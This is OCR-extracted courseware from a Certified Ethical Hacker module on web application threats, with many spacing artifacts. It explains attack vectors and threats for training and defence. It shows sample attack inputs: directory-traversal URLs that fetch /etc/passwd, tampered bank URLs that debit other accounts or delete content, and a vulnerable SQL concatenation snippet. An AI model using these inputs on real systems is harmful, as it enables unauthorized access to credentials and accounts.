  24. 24. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications - C E H ( ‫־‬ ‫־‬ ‫־‬ W e b A t t a c k V e c t o r s A n a tta c k v e c to r is a p a th o r m e a n s b y w h ic h a n a tta c k e r ca n g a in w a ccess to c o m p u te r o r n e tw o r k re s o u rc e s in o r d e r to d e liv e r an a tta c k p a y lo a d o r c a u s e a m a lic io u s o u tc o m e A tta c k v e c to rs in c lu d e p a r a m e te r m a n ip u la tio n , X M L p o is o n in g , c lie n t v a lid a tio n , s e rv e r m is c o n fig u ra tio n , w e b s e rv ic e r o u tin g issu e s, a n d c ro s s -s ite s c rip tin g S e c u rity c o n tr o ls n e e d to b e u p d a te d c o n tin u o u s ly as th e a tta c k v e c to rs ke e p c h a n g in g w ith re s p e c t to a ta rg e t o f a tta c k C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . W e b A t t a c k V e c t o r s An attack vector is a m ethod o f entering into to unauthorized systems to perform ing m alicious attacks. Once the attacker gains access into the system or the netw ork he or she delivers an attack payload or causes a m alicious outcom e. No protection m ethod is com pletely a tta ck-p ro o f as attack vectors keep changing and evolving w ith new technological changes. Examples o f various types o f attack vectors: © P aram eter m an ip u la tio n : Providing the w rong input value to the w eb services by the attacker and gaining the control over the SQL, LDAP, XPATH, and shell com m ands. W hen the incorrect values are provided to the w eb services, then they become vulnerable and are easily attacked by w eb applications running w ith w eb services. 0 XML poisoning: Attackers provide m anipulated XML docum ents th a t w hen executed can disturb the logic o f parsing m ethod on the server. W hen huge XMLs are executed at the application layer, then they can be easily be com prom ised by the attacker to launch his or her attack and gather inform ation. © Client va lid a tio n : M ost client-side validation has to be supported by server-side authentication. The AJAX routines can be easily m anipulated, which in tu rn makes a way fo r attackers to handle SQL injection, LDAP injection, etc. and negotiate the web application's key resources. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1746
  25. 25. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications 0 Server M isconfiguration: The attacker exploits the vulnerabilities in the w eb servers and tries to break the validation m ethods to get access to the co n fid e n tia l data stored on the servers. 0 Web service routing issues: The SOAP messages are perm itted to access d iffe re n t nodes on the Internet by the W S-Routers. The exploited interm ediate nodes can give access to the SOAP messages th a t are com m unicated betw een tw o endpoints. 0 Cross-site scripting: W henever any infected JavaScript code is executed, then the targeted browsers can be exploited to gather inform ation by the attacker. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1747
  26. 26. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C o p yrig h t © by E&Coinal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . ‫־‬ ‫־‬ ^ M o d u l e F l o w W eb applications are targeted by attackers fo r various reasons. The first issue is quality o f the source code as related to security is poor and another issue is an application w ith "com plex setup." Due to these loopholes, attackers can easily launch attacks by e xploiting them . Now we w ill discuss the threats associated w ith w eb applications. ^ Web App Pen Testing Web App Concepts m Security Tools W eb App Threats J k Countermeasures e‫־‬‫־‬‫־‬s Hacking Methodology 1S> Web Application Hacking Tools B# Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1748
  27. 27. This section lists and explains the various w eb application th re a ts such as p aram eter/form tam pering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, im proper e rror handling, etc. Ethical Hacking and Countermeasures Exam312-50 Certified Ethical Hacker Hacking Web Applications Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1749
  28. 28. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n T h r e a t s 1 ‫־‬ C E H UrtiM Itkml Mstkm B ro ke n A c c o u n t M a n a g e m e n t In fo rm a tio n Leakage Im p ro p e r E rro r H a n d lin gS to ra g e C oo kie P o iso n in g Cop> ■ight © by EC -C a uacil. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . W e b A p p l i c a t i o n T h r e a t s - 1 W eb application threats are not lim ited to attacks based on URL and port80. Despite using ports, protocols, and the OSI layer, the integrity o f m ission-critical applications m ust be protected from possible fu tu re attacks. Vendors w ho w ant to protect th e ir products' applications m ust be able to deal w ith all m ethods o f attack. The various types o f w eb application threats are as follow s: C o o k i e P o i s o n i n g By changing the inform ation inside the cookie, attackers bypass the a u th e n tica tio n process and once they gain control over the netw ork, they can either m odify the content, use the system fo r the m alicious attack, or steal in fo rm a tio n from the user's system. D i r e c t o r y T r a v e r s a l Attackers e xp lo it HTTP by using d ire cto ry traversal and they w ill be able to access restricted directories; they execute com m ands outside o f the w eb server's root directory. U n v a l i d a t e d I n p u t In order to bypass the security system, attackers tam per w ith the h ttp requests, URL, headers, form fields, hidden fields, query strings etc. Users' login IDs and oth e r related Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1750
  29. 29. Exam 312-50 C ertified Ethical HackerEthical Hacking and Counterm easures Hacking Web Applications data gets stored in the cookies and this becomes a source o f attack fo r the intruders. Attackers gain access to the victim 's system using the inform ation present in cookies. Examples o f attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflow s, etc. C r o s s - s i t e S c r i p t i n g (X S S ) " i T f An attacker bypasses the clients ID security m echanism and gains access privileges, and then injects m alicious scripts into the web pages o f a particular website. These m alicious scripts can even rew rite the HTML content o f the website. I n j e c t i o n F la w s Injection flaws are w eb application vulnerabilities th a t allow untrusted data to be interpreted and executed as part o f a com m and or query. S Q L I n j e c t i o n This is a type o f attack w here SQL com m ands are injected by the attacker via input data; then the attacker can tam per w ith the data. P a r a m e t e r / F o r m T a m p e r i n g a This type o f tam pering attack is intended to m anipulating the param eters exchanged betw een client and server in order to m o d ify application data, such as user credentials and permissions, price and qua n tity o f products, etc. This inform ation is actually stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application fu n ctio n a lity and control. Man in the m iddle is one o f the examples fo r this type o f attack. Attackers use tools like W eb scarab and Paros proxy fo r these attacks. D e n i a l - o f - S e r v i c e ( D o S ) M | | M ' ' t__ i__ A denial-of-service attack is an attacking m ethod intended to te rm in a te the operations o f a w ebsite or a server and make it unavailable to intended users. For instance, a w ebsite related to a bank or em ail service is not able to function fo r a few hours to a few days. This results in loss o f tim e and money. B r o k e n A c c e s s C o n t r o l Broken access control is a m ethod used by attackers w here a particular fla w has been identified related to the access control, w here a u th e n tica tio n is bypassed and the attacker com prom ises the netw ork. VA /// C r o s s - s i t e R e q u e s t F o r g e r y The cross-site request forgery m ethod is a kind o f attack w here an authenticated user in m ade to perform certain tasks on the w eb application th a t an attackers chooses. For exam ple, a user clicking on a particular link sent through an em ail or chat. I n f o r m a t i o n L e a k a g e Inform ation leakage can cause great losses fo r a com pany. Hence, all sources such as Module 13 Page 1751 Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. R eproduction is S trictly Prohibited.
  30. 30. Exam 312-50 C ertified Ethical HackerEthical Hacking and Counterm easures Hacking Web Applications systems or oth e r netw ork resources m ust be protected from inform ation leakage by em ploying proper content filte rin g m echanism s. I m p r o p e r E r r o r H a n d l i n g It is necessary to define how the system or netw ork should behave when an error occurs. O therw ise, it may provide a chance fo r the attacker to break into the system. Im proper e rro r handling may lead to DoS attacks. L o g T a m p e r i n g Logs are m aintained by w eb applications to track usage patterns such as user login credentials, adm in login credentials, etc. Attackers usually inject, delete, or tam per w ith w eb application logs so th a t they can perform m alicious actions or hide th e ir identities. B u f f e r O v e r f l o w A w eb application's b uffer overflow vulnerability occurs when it fails to guard its buffer properly and allows w ritin g beyond its m axim um size. B r o k e n S e s s io n M a n a g e m e n t W hen security-sensitive credentials such as passwords and oth e r useful m aterial are not properly taken care, these types o f attacks occur. Attackers com prom ise the credentials through these security vulnerabilities. S e c u r i t y M i s c o n f i g u r a t i o n Developers and netw ork adm inistrators should check th a t the entire stack is configured properly or security m isconfiguration can happen at any level o f an application stack, including the platform , w eb server, application server, fram ew ork, and custom code. Missing patches, m isconfigurations, use o f default accounts, etc. can be detected w ith the help o f autom ated scanners th a t attackers exploit to com prom ise w eb application security. B r o k e n A c c o u n t M a n a g e m e n t ---------- Even authentication schemes th a t are valid are weakened because o f vulnerable account m anagem ent functions including account update, fo rg o tte n or lost password recovery or reset, password changes, and oth e r sim ilar functions. I n s e c u r e S t o r a g e W eb applications need to store sensitive inform ation such as passwords, credit card num bers, account records, or oth e r authentication inform ation som ew here; possibly in a database or on a file system. If proper security is not m aintained fo r these storage locations, then the w eb application may be at risk as attackers can access the storage and misuse the inform ation stored. Insecure storage o f keys, certificates, and passwords allow the attacker to gain access to the w eb application as a le g itim a te user. Module 13 Page 1752 Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. R eproduction is S trictly Prohibited.
  31. 31. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n T h r e a t s ■ 2 C E H Failure to R e s tric t URL Access ‫׳‬V S e c u rity M a n a g e m e n t E x p lo its & v 1‫־‬ In s u ffic ie n t T ra n s p o rt L aye r P ro te c tio n O b fu s c a tio n A p p lic a tio n D M Z P ro to c o l A tta c k s U n v a lid a te d R e d ire c ts a nd F o rw a rd s M a lic io u s File E xe cu tio n Session F ix a tio n A tta c k P la tfo rm E xp lo its In se cu re D ire c t O b je c t R e fe re n ce s In se cu re C ry p to g ra p h ic S to ra g e A u th e n tic a tio n W e b S ervices H ija ckin g A tta c k s C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . W e b A p p l i c a t i o n T h r e a t s 2 ‫־‬ P l a t f o r m E x p l o i t s Various w eb applications are built on by using d iffe re n t platform s such as BEA W eb logic and ColdFusion. Each platform has various vulnerabilities and exploits associated w ith it. in I n s e c u r e D i r e c t O b j e c t R e f e r e n c e s § W hen various in te rn a l im p le m e n ta tio n objects such as file, directory, database record, or key are exposed through a reference by a developer, then the insecure direct object reference takes place. For exam ple, w here a bank account num ber is made a prim ary key, then there is a good change it can be com prom ised by the attacker based on such references. I n s e c u r e C r y p t o g r a p h i c S t o r a g e W hen sensitive data has been stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption m ethods developed by developers are not up to par. Cryptographically very strong encryption m ethods have to be used. At the same tim e, care m ust be taken to store the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1753
  32. 32. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications A u t h e n t i c a t i o n H i j a c k i n g In order to identify the user, every w eb application uses user identificatio n such as a user ID and password. Once the attacker com prom ises the system, various m alicious things like th e ft o f services, session hijacking, and user im personation can occur. N e t w o r k A c c e s s A t t a c k s fill 11= N etw ork access attacks can m ajorly im pact w eb applications. These can have an effect on basic level o f services w ith in an application and can allow access th a t standard HTTP application m ethods w ould not have access to. C o o k i e S n o o p in g = Attackers use cookie snooping on a victim 's system to analyze th e ir surfing habits and sell th a t inform ation to oth e r attackers or may use this inform ation to launch various attacks on the victim 's w eb applications. W e b S e r v ic e s A t t a c k s W eb services are process-to-process com m unications th a t have special security issues and needs. An attacker injects a m alicious script into a w eb service and is able to disclose and m odify application data. - ^ I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n SSL/TLS authentications should be used fo r authentication on w ebsites or the attacker can m o n ito r netw ork tra ffic to steal an authenticated user's session cookie. Various threats such as account th e ft, phishing attacks, and adm in accounts may happen after systems are being com prom ised. r ‫״‬ H i d d e n M a n i p u l a t i o n I These types o f attacks are m ostly used by attackers to com prom ise e-com m erce websites. Attackers m anipulate the hidden fields and change the data stored in them . Several online stores face this type o f problem every day. Attackers can alter prices and conclude transactions w ith the prices o f th e ir choice. D M Z P r o t o c o l A t t a c k s The DMZ (D em ilitarized Zone) is a sem i-trusted netw ork zone th a t separates the untrusted Internet from the com pany's trusted internal netw ork. An attacker w ho is able to com prom ise a system th a t allows other DMZ protocols has access to oth e r DMZs and internal systems. This level o f access can lead to: © Com prom ise o f the w eb application and data Q D efacem ent o f websites © Access to internal systems, including databases, backups, and source code Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1754
  33. 33. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s _____ Attackers make a victim click an unvalidated link th a t appears to be a valid site. Such redirects may a tte m p t to install m alw are or tric k victim s into disclosing passwords or oth e r sensitive inform ation. Unsafe forw ards may allow access control bypass leading to: 0 Session fixation attacks © Security m anagem ent exploits 0 Failure to restrict URL access e M alicious file execution F a i l u r e t o R e s t r i c t U R L A c c e s s An app ication often safeguards or protects sensitive fu n ctio n a lity and prevents the displays o f links or URLs fo r protection. Attackers access those links or URLs directly and perform illegitim ate operations. O b f u s c a t i o n A p p l i c a t i o n Attackers usually w ork hard at hiding th e ir attacks and to avoid detection. N etw ork and host intrusion detection systems (IDSs) are constantly looking fo r signs o f w ell- know n attacks, driving attackers to seek d iffe re n t ways to rem ain undetected. The m ost com m on m ethod o f attack obfuscation involves encoding portions o f the attack w ith Unicode, UTF-8, or URL encoding. Unicode is a m ethod o f representing letters, num bers, and special characters so these characters can be displayed properly, regardless o f the application or underlying platform in which they are used. S e c u r i t y M a n a g e m e n t E x p l o i t s Some attackers target security m anagem ent systems, either on netw orks or on the application layer, in order to m odify or disable security enforcem ent. An attacker w ho exploits security m anagem ent can directly m odify p ro te ctio n policies, delete existing policies, add new policies, and m odify applications, system data, and resources. __ L * S e s s io n F i x a t i o n A t t a c k ______ In a session fixation attack, the attacker tricks or attracts the user to access a legitim ate w eb server using an explicit session ID value. M a l i c i o u s F i l e E x e c u t i o n ___ M alicious file execution vulnerabilities had been found on m ost applications. The cause o f this vulnerability is because o f unchecked input into the w eb server. Due to this unchecked input, the files of attackers are easily executed and processed on the web server. In addition, the attacker perform s rem ote code execution, installs the ro o tk it rem otely, and in at least some cases, takes com plete control over the systems. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1755
  34. 34. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C E HU n v a l i d a t e d I n p u t An attacker exploits inp u t validation flaw s to p erform cross-site scripting, b uffe r overflow , injection attacks, etc. th a t result in data th e ft and system m a lfun ctio n in g D a ta b a s e • B row ser input not • validated by the w eb : application s t r in g s q l — ,,s e l e c t * from U sers where u se r = ‫י‬ " + U se r. T ex t + ‫י‬‫יי‬ and pwd= ‫״‬‫י‬ + P assw o rd .T ex t + ‫״‬ !« r In p u t validation flaw s refers to a w eb application vulnerability w here in p u t fro m a clie n t is not valid a te d before being processed by w eb applications and backend servers Boy.com h t t p : / / j u g g y b o y . c o m / l o g i n . a s p x ? u s e r = j a s o n s 0 p a s s = s p r x n g f i e ld M o d ifie d Q ueryB row ser Post Request C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . U n v a l i d a t e d I n p u t An input va lid a tio n fla w refers to a w eb application vulnerability w here input from a client is not validated before being processed by w eb applications and backend servers. Sites try to protect them selves from m alicious attacks through input filtra tio n , but there are various m ethods prevailing fo r the the purpose o f encoding. M any h ttp inputs have m ultiple form ats th a t make filte rin g very d ifficu lt. The canonicalization m ethod is used to sim plify the encodings and is useful in avoiding various vulnerable attacks. W eb applications use only a client-side m echanism in input validation and attackers can easily bypass it. In order to bypass the security system, attackers tam per the h ttp requests, URLs, headers, form fields, hidden fields, and query strings. Users‫׳‬ login IDs and oth e r related data gets stored in the cookies and this becomes a source o f attack fo r intruders. Attackers gain access to the systems by using the inform ation present in the cookies. Various m ethods used by hackers are SQL injection, cross-site scripting (XSS), b uffer overflow s, fo rm a t string attacks, SQL injection, cookie poisoning, and hidden field m anipulation th a t result in data th e ft and system m alfunctioning. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1756
  35. 35. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications h t t p : / / ju g g y b o y . c o m / l o g i n . a s p x ? u s e r = ja s o n s @ p a s s = s p r in g f ie ld D a ta b a s e : Brow ser input not : validated by th e w eb : application s t r in g s q l — ,,s e l e c t * from U sers Wtmmrnmr* w here u s e r = ' ” + U se r .T e x t + ‫״‬ ' and pwd=1‫״‬ + P a ssw o r d .T e x t + " '"r M o d ifie d Q ueryB ro w se r Post R equest F ig u re 1 3 .5 : U n v a lid a te d In p u t Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1757
  36. 36. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications P a r a m e t e r / F o r m T a m p e r i n g ‫ו‬ C E H Urtifwd tlfcxjl lUthM J A w eb param eter tam pering attack involves the m anip u la tio n o f param eters exchanged between ______ . - - . client and server in o rder to m odify application data such as user credentials and perm issions, price, and q uantity o f products J A param eter tam pering attack e xplo its vu ln e ra b ilitie s in integrity and logic validation mechanisms th a t may result in XSS, SQL injection, etc. C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . P a r a m e t e r / F o r m T a m p e r i n g r-• ■‫ייי‬‫ח‬ Param eter tam pering is a sim ple form o f attack aim ed directly at the application's business logic. This attack takes advantage o f the fact th a t m any program m ers rely on hidden or fixed fields (such as a hidden tag in a form or a param eter in an URL) as the only security measure fo r certain operations. To bypass this security m echanism , an attacker can change these param eters. D etailed D escription Serving the requested files is the m ain function o f w eb servers. During a w eb session, param eters are exchanged betw een the w eb brow ser and the w eb application in order to m aintain inform ation about the client's session, which elim inates the need to m aintain a com plex database on the server side. URL queries, form fields, and cookies are used to pass the param eters. Changed param eters in the form field are the best exam ple o f param eter tam p e rin g . W hen a user selects an HTML page, it is stored as a form field value, and transferred as an HTTP page to the web application. These values may be pre-selected (com bo box, check box, radio buttons, etc.), free text, or hidden. An attacker can m anipulate these values. In some extrem e cases, it is just like saving the page, editing the HTML, and reloading the page in the w eb browser. 0 (D ® 1 | http://www.juggybank.com/cust.asp?profile=21&debit=2500< ........J■• T a m p erin g w ith th e | URL p a ra m e te rs 1 0 @ ® 1 | http://www.juggybank.com/cust.asp?profile=82&debtt=lSOO< ........J•■1...... ......... | http://www.juggybank.com/stat.asp?pg=531&status=view < ......... O th e r p a ra m e te rs can be ch an g e d in c lu d in g a ttrib u te p a ra m e te rs 0 © ® | http://www.juggybank.com/stat.asp?pg-147&status‫־‬ delete < •••• Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1758
  37. 37. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications Hidden fields th a t are invisible to the end user provide inform ation status to the web application. For exam ple, consider a product order form th a t includes the hidden field as follow s: < in p u t ty p e = "h id d e n " n a m e = "p ric e " v a lu e = "9 9 . 90"> Combo boxes, check boxes, and radio buttons are examples o f pre-selected param eters used to transfer inform ation betw een d iffe re n t pages, w hile allow ing the user to select one o f several predefined values. In a param eter tam pering attack, an attacker may m anipulate these values. For exam ple, consider a form th a t includes the com bo box as follow s: <FORM METHOD=POST AC TIO N ="xferM oney. a sp ‫״‬ > Source A c c o u n t: <SELECT NAME="SrcAcc"> <OPTION VALUE=" 1 2 3 4 5 6 7 8 9 "> ******7 8 9</OPTION> <OPTION V A LU E ="868686868">******868</O P TIO N X /S E LE C T> <BR>Amount: <INPUT NAME="Amount" SIZE=20> < B R > D e s tin a tio n A c c o u n t: <INPUT NAME="DestAcc" SIZE=40> <BRXINPUT TYPE=SUBMIT> <INPUT TYPE=RESET> </FORM> Bypassing An attacker may bypass the need to choose betw een tw o accounts by adding another account into the HTML page source code. The new com bo box is displayed in the w eb brow ser and the attacker can choose the new account. HTML form s subm it th e ir results using one o f tw o m ethods: GET or POST. In the GET m ethod, all form param eters and th e ir values appear in the query string o f the next URL, which the user sees. An attacker may tam per w ith this query string. For exam ple, consider a w eb page th a t allows an authenticated user to select one o f his or her accounts from a com bo box and debit the account w ith a fixed unit am ount. W hen the subm it button is pressed in the w eb browser, the URL is requested as follow s: http://w w w .iuggvbank.com /cust.asp?profile=21& debit=2500 An attacker may change the URL param eters (profile and debit) in order to debit another account: http://w w w .iuggybank.com /cust.asp?profile=82& debit=1500 There are other URL param eters th a t an attacker can m odify, including a ttrib u te param eters and internal m odules. A ttrib u te param eters are unique param eters th a t characterize the behavior o f the uploading page. For exam ple, consider a content-sharing w eb application th a t enables the content creator to m odify content, w hile oth e r users can only view the content. The w eb server checks w heth e r the user w ho is accessing an entry is the author or not (usually by cookie). An ordinary user w ill request the follow ing link: http://w w w .iuggybank.com /stat.asp?pg=531& status=view Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1759
  38. 38. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications An attacker can m odify the status param eter to ‫״‬delete‫״‬ in order to delete perm ission fo r the content. http://w w w .iuggybank.com /stat.asp?pg=147& status=delete P aram eter/form tam pering can lead to th e ft o f services, escalation o f access, session hijacking, and assuming the id e n tity o f other users as well as param eters allow ing access to developer and debugging inform ation. T a m p e rin g w ith th e U RL p a ra m e te rs O th e r p a ra m e te rs ca n b e c h a n g e d in c lu d in g a ttr ib u te p a ra m e te rs http://www.juggybank.com/cust.asp?profile=21&debit=2500 [GO ‫ר‬http://www.juggybank.com/cust.asp?profile=82&debit=1500 h ttp ://w w w .juggybank.com /stat. asp?pg=531&status=view <£ | GO ‫ך‬http://w w w .ju ggyban k.com /stat.a sp?pg=1 47& status=delete |QO FIGURE 13.6: Form Tampering Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1760
  39. 39. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications D i r e c t o r y T r a v e r s a l C E H C«rt1fW4 itkiul Nm Im C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . v D i r e c t o r y T r a v e r s a l ___ W hen access is provided outside a defined application, there exists the possibility o f unintended inform ation disclosure or m odification. Com plex applications exist as application com ponents and data, which are typically configured in m ultiple directories. An application has the ability to traverse these m ultiple directories to locate and execute the legitim ate portions o f an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse fo r directories and files outside the norm al application access. A D irectory Traversal/Forceful Browsing attack exposes the d ire cto ry structure o f an application, and often the underlying w eb server and operating system. W ith this level o f access to the web application architecture, an attacker can: © Enum erate the contents of files and directories © Access pages th a t otherw ise require authentication (and possibly paym ent) © Gain secret know ledge o f the application and its construction © Discover user IDs and passwords buried in hidden files © Locate source code and other interesting files left on the server © View sensitive data, such as custom er inform ation Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1761
  40. 40. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications The follow ing exam ple uses to backup several directories and obtain a file containing a backup o f the web application: h ttp ://w w w .ta rg e tsite .co m /../../../site b a cku p .zip This exam ple obtains the "/e tc/p a ssw d " file from a UNIX/Linux system, which contains user account inform ation: h ttp ://w w w .ta rg e ts ite .c o m /../../../../e tc /p a s s w d Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal: http://w w w .iuggybov.com /process.aspx=.J . / s o m e dir/som e file h ttp ://w w w .iu g g yb o y.co m /../■ ./../../so m e dir/som e file The pictorial representation o f directory traversal attack is shown as follow s: s <?php $theme — 'Jaoon.php', J 1 ‫יי‬’‫™־״־‬‫״‬—’‫׳‬*‫׳־‬ ) ) > □c /../../••/etc/passwd password files A tta c k e r V u ln e ra b le S e rv e r C o d e ro o t:a 9 8 b 2 4 a Id 3 e 8 :0 : l:S y s te m O p e ra t o r:/:/b in /k sh d a e m o n : * : l: l: :/ tm p : J a s o n :a 3 b 6 9 8 a 7 6 f7 6 d 5 7 .:1 8 2 :1 0 0 :D e v e lo p e r:/h o m e /u s e rs /J a s o n / :/ b in / c s h FIGURE 1 3 .7 : D ire c to ry T ra v e rs a l Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1762
  41. 41. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications S e c u r i t y M i s c o n f i g u r a t i o n C E H Easy Exploitation Using misconfiguration vulnerabilities, attackers gain unauthorized accesses to default accounts, read unused pages, exploit unpatched flaws, and read or w rite unprotected files and directories, etc. Common Prevalence Security misconfiguration can occur at any level o f an application stack, including the platform, web server, application server, fram ework, and custom code Example e The application server admin console is automatically installed and not removed Default accounts are not changed Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . M S e c u r i t y M i s c o n f i g u r a t i o n ' ____ " Developers and netw ork a d m in istra to rs should check th a t the entire stack is configured properly or security m isconfiguration can happen at any level o f an application stack, including the platform , w eb server, application server, fram ew ork, and custom code. For instance, if the server is not configured properly, then it results in various problem s th a t can infect the security o f a website. The problem s th a t lead to such instances include server softw are flaws, unpatched security flaws, enabling unnecessary services, and im proper authentication. A few o f these problem s can be detected easily w ith the help o f autom ated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care o f and it proves very beneficial if they are com pletely disabled so th a t the outsiders d o n 't make use o f them fo r m alicious attacks. All the application-based files have to be taken care o f through proper authentication and strong security m ethods or crucial inform ation can be leaked to the attackers. Examples o f unnecessary features th a t should be disable or changed include: Q The application server adm in console is autom atically installed and not rem oved © D efault accounts are not changed Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1763
  42. 42. 6 A ttacker discovers the standard adm in pages on server, logs in w ith default passwords, and takes over Ethical Hacking and Countermeasures Exam312-50 Certified Ethical Hacker Hacking Web Applications Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1764
  43. 43. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications I n j e c t i o n F l a w s C E H Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part o f a command or query Attackers exploit injection flaws by constructing malicious comm ands or queries that result in data loss or corruption, lack o f accountability, or denial o f access Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers LDAP InjectionCommand InjectionSQL Injection It involves the injection of malicious LDAP statements It involves the injection o f malicious code through a web application It involves the injection o f malicious SQL queries into user input form s SQL Server JJ — C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . I n j e c t i o n F l a w s Injection flaws are the loopholes in the w eb application th a t allow unreliable data to be interpreted and executed as part of a com m and or query. The injection flaws are being exploited by the attacker by constructing m alicious com m ands or queries th a t result in loss of data or corruption, lack o f accountability, or denial o f access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaw s in the web application, the attacker can easily read, w rite , delete, and update any data, i.e., relevant or irrelevant to th a t particular application. They are m any types o f injection flaws; some o f them are as follow s: S Q L i n j e c t i o n SQL injection is the m ost com m on w ebsite vulnerability on the Internet. It is the technique used to take advantage o f non-validated input vulnerabilities to pass SQL com m ands through a w eb application fo r execution by a backend database. In this, the attacker injects the m alicious SQL queries into the user input form and this is usually perform ed to either to gain unauthorized access to a database or to retrieve inform ation directly from the database. * C o m m a n d i n j e c t i o n The flaws in com m and injection are another type o f w eb application vulnerability. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1765
  44. 44. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications These flaws are highly dangerous. In this type o f attack, the attacker injects the m alicious code via a w eb application. L A D P i n j e c t i o n ‫־‬ LDAP injection is an attack m ethod in which the w ebsite th a t constructs the LDAP statem ents from user-supplied input are exploited fo r launching attacks. W hen an application fails to sanitize the user input, then the LDAP statem ent can be m odified w ith the help o f local proxy. This in tu rn results in the execution o f a rb itra ry com m ands such as granting access to unauthorized queries and altering the content inside the LDAP tree. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1766
